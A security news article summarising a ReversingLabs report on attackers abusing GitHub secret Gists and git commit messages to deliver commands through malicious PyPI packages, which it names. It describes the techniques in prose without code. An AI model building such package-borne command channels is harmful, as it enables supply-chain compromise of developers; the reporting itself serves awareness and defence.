Malicious actors are adopting innovative tactics by leveraging GitHub for malicious purposes, employing novel methods such as abusing secret Gists and issuing malicious commands through git commit messages.

According to a report by ReversingLabs, threat actors have increasingly turned to the GitHub open-source development platform for hosting malware, signaling a shift in their strategies. Traditionally, threat actors have utilized legitimate public services like Dropbox, Google Drive, OneDrive, and Discord for hosting second-stage malware and evading detection tools.

One notable evolution in this trend is the abuse of GitHub Gists, with threat actors utilizing both public and secret Gists as repositories to host malicious content. Gists, serving as a means for developers to share code snippets, present a unique challenge as they can be easily shared, including secret Gists, without visibility on the GitHub profile page.

The report highlights the identification of PyPI packages masquerading as network proxying libraries, including httprequesthub, pyhttpproxifier, libsock, libproxy, and libsocks5. These packages contained Base64-encoded URLs pointing to secret Gists hosted in throwaway GitHub accounts, with the Gists featuring Base64-encoded commands executed through malicious code.

Additionally, the exploitation of version control system features has been observed, with a PyPI package named easyhttprequest incorporating malicious code that extracts commands from git commit messages for execution on the system. This technique involves cloning a specific GitHub repository and checking for commit messages that trigger Python command execution.

While GitHub has been used as command-and-control (C2) infrastructure in the past, the abuse of features like Git Gists and commit messages for command delivery represents novel approaches by malicious actors. The report emphasizes the need for heightened awareness and monitoring to detect and respond to these evolving threat tactics effectively.